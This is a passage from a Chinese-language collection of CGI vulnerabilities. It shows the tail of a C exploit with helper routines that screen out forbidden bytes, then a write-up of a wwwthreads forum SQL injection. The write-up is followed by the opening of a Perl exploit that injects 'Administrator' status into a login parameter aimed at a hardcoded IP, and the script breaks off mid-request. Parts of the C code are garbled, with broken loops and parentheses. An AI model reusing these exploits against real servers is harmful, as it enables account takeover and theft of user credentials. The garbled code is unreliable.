CGI漏洞

CGI漏洞(28) exit(-1);
}

return(sd);
}
/*
This function checks for illegal bytes in "long" types
*/

int ICinInt(long s, char *forbidden, size_t fsize)
{
int i,j;

for(i=0;i for(j=0;j if((char)(s >> j*8) == forbidden) return(1);
}
}
return(0);
}

/*
Wrapper for malloc() that does error checking
*/

void *xmalloc(size_t size)
{
void *blah;

if((blah = malloc(size)) == NULL) {
perror("malloc()";
exit(-1);
}
return(blah);
}

------------------------- END -----------------------------------------------------

四十二.wwwthreads
wwwthreads是应用很广的论坛服务程序，在一些国外的安全论坛上应用较多。这套论坛程序有个漏洞，
其SQL information retrieval engine允许远程用户获取用户名和密码，允许入侵者使用insert的SQL命令，
获取数据库的访问权。在一个全世界最著名的黑客站点之一的论坛上测试通过。 
　

Exploit:
-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a ‘\‘ before the ‘$‘ characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d‘Administrator‘,U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".